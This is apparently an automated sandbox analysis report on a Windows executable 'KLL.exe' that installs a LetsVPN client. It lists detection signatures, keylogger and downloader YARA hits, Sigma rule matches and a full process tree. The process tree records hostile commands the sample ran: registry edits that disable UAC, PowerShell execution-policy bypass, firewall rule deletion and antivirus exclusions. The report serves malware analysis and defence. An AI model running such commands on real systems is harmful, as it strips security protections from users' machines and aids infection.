Edit tour

Windows Analysis Report
KLL.exe

Overview

General Information

Sample name:	KLL.exe
Analysis ID:	1477236
MD5:	5ffebaab4f8218b7abff3a8258dbf316
SHA1:	0808b7cc585e310e5576ad1a44eb37b963d952ef
SHA256:	f0795ab570128f9924611a8955e964a2121aac61135701cbdd38664ca746b1d4
Tags:	exe
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Bypasses PowerShell execution policy

Connects to many ports of the same IP (likely port scanning)

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Found evasive API chain (may stop execution after checking mutex)

Loading BitLocker PowerShell Module

Modifies the DNS server

Modifies the windows firewall

Performs a network lookup / discovery via ARP

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sample is not signed and drops a device driver

Uses cmd line tools excessively to alter registry or file data

Uses ipconfig to lookup or modify the Windows network settings

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

PE file overlay found

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Tap Installer Execution

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

KLL.exe (PID: 1616 cmdline: "C:\Users\user\Desktop\KLL.exe" MD5: 5FFEBAAB4F8218B7ABFF3A8258DBF316)

cmd.exe (PID: 4196 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 6528 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

netsh.exe (PID: 1292 cmdline: "C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2196 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\JM2KJ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6796 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6284 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 5204 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7240 cmdline: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 64 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

mmc.exe (PID: 7292 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)

uc_ctrl.exe (PID: 7340 cmdline: "C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe" MD5: 8AA07B7C6C632F4EDF07A0E2B91F8566)

cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 7716 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

mmc.exe (PID: 7420 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)

letsvpn-latest.exe (PID: 7460 cmdline: "C:\ProgramData\letsvpn-latest.exe" MD5: 7CE62DC191CEE9DD1488C9D0A25FEDA4)

powershell.exe (PID: 7540 cmdline: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8012 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tapinstall.exe (PID: 2852 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tapinstall.exe (PID: 7720 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7572 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6464 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 6432 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7148 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 7520 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 8028 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 3084 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 6836 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

tapinstall.exe (PID: 8136 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

LetsPRO.exe (PID: 5872 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: 8FC872149F0B8D2FB3D75C4076C0A8CA)

LetsPRO.exe (PID: 4892 cmdline: "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" MD5: D664FB656FC05BE54EA49950688BE980)

cmd.exe (PID: 7456 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 6904 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

cmd.exe (PID: 7704 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ROUTE.EXE (PID: 5140 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)

cmd.exe (PID: 7760 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ARP.EXE (PID: 5052 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)

svchost.exe (PID: 7652 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

drvinst.exe (PID: 7860 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{d5789730-0a86-5a48-af99-19a03327caf5}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)

drvinst.exe (PID: 6904 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000014C" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)

svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 5952 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WmiApSrv.exe (PID: 1776 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)

LetsPRO.exe (PID: 6620 cmdline: "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent MD5: D664FB656FC05BE54EA49950688BE980)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\letsvpn\app-3.7.0\netstandard.dll	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\letsvpn\Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Program Files (x86)\letsvpn\app-3.7.0\libwin.dll	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
60.2.LetsPRO.exe.68950000.20.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", CommandLine: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", CommandLine|base64offset|contains: )f, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 7460, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe" /silent, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LetsPRO

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe, ProcessId: 4892, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gp4y1i2i.4ju.ps1

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KLL.exe", ParentImage: C:\Users\user\Desktop\KLL.exe, ParentProcessId: 1616, ParentProcessName: KLL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\SQBg9\KQ3ts~m8\s+C:\ProgramData\SQBg9\KQ3ts~m8\a C:\ProgramData\SQBg9\KQ3ts~m8\uc_guilib.dll, ProcessId: 7240, ProcessName: cmd.exe

Sigma detected: Tap Installer Execution

Source: Process started

Author: Daniil Yugoslavskiy, Ian Davis, oscd.community: Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 7460, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 2852, ProcessName: tapinstall.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", CommandLine: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", CommandLine|base64offset|contains: )f, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 7460, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell.exe -inputformat none -ExecutionPolicy Bypass -Command "If ($env:PROCESSOR_ARCHITEW6432) { $env:PROCESSOR_ARCHITEW6432 } Else { $env:PROCESSOR_ARCHITECTURE }", ProcessId: 7540, ProcessName: powershell.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\KLL.exe", ParentImage: C:\Users\user\Desktop\KLL.exe, ParentProcessId: 1616, ParentProcessName: KLL.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, ProcessId: 4196, ProcessName: cmd.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 64, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: KLL.exe	ReversingLabs: Detection: 31%
Source: KLL.exe	Virustotal: Detection: 32%			Perma Link

Source: KLL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: drvinst.exe, 00000028.00000003.2603338357.000001C1D95AD000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000028.00000003.2598324806.000001C1D94EE000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000029.00000003.2613186050.000001D200F14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdbR source: LetsPRO.exe, 0000003C.00000002.4117282589.0000000039F82000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: LetsPRO.exe, 0000003C.00000002.4063922305.0000000006942000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\simba9_pc\trunk\simba9\bin\Release\bin\uc_ctrl.pdb source: uc_ctrl.exe, 00000013.00000002.4020635619.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp, uc_ctrl.exe, 00000013.00000000.2301032573.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: LetsPRO.exe, 0000003C.00000000.2674724557.0000000000FC2000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: LetsPRO.exe, 0000003C.00000002.4064210674.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 0000003B.00000002.2689821111.0000000000F4D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003B.00000000.2674046018.0000000000F4D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\simba9_pc\trunk\simba9\bin\Release\bin\uc_ctrl.pdb22 source: uc_ctrl.exe, 00000013.00000002.4020635619.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp, uc_ctrl.exe, 00000013.00000000.2301032573.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\git\OSS\notifyicon-wpf\Hardcodet.NotifyIcon.Wpf\Source\NotifyIconWpf\obj\Release\Hardcodet.Wpf.TaskbarNotification.pdb source: LetsPRO.exe, 0000003C.00000002.4097109567.0000000035C42000.00000002.00000001.01000000.00000033.sdmp
Source:	Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x86\e_sqlite3.pdb source: LetsPRO.exe, 0000003C.00000002.4139617081.0000000067F37000.00000002.00000001.01000000.0000002E.sdmp
Source:	Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdb source: tapinstall.exe, 00000023.00000000.2581148490.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2582900585.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000002.2621289880.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000025.00000000.2583643703.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000002.2636929891.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000039.00000000.2632218485.00007FF6FFBE1000.00000020.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenterAnalytics\Microsoft.AppCenter.Analytics.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Analytics.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4072724496.00000000301D2000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\WorkShop\WebSocket4Net\WebSocket4Net\obj\Release\WebSocket4Net.pdb source: LetsPRO.exe, 0000003C.00000002.4116789613.0000000039E02000.00000002.00000001.01000000.0000003B.sdmp
Source:	Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: LetsPRO.exe, 0000003C.00000002.4064675178.0000000007112000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: LetsPRO.exe, 0000003C.00000002.4074066016.0000000030482000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: LetsPRO.exe, 0000003C.00000002.4082995066.0000000030F62000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: LetsPRO.exe, 0000003C.00000002.4063839681.00000000068D2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdb source: LetsPRO.exe, 0000003C.00000002.4063520256.00000000068A2000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256xpRb source: LetsPRO.exe, 0000003C.00000002.4083227648.0000000030F92000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: LetsPRO.exe, 0000003C.00000002.4083406917.0000000030FB2000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: LetsPRO.exe, 0000003C.00000002.4063839681.00000000068D2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: LetsPRO.exe, 0000003C.00000002.4083406917.0000000030FB2000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000015.00000003.2674604812.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000002.2675464551.00000000007F6000.00000004.00000020.00020000.00000000.sdmp
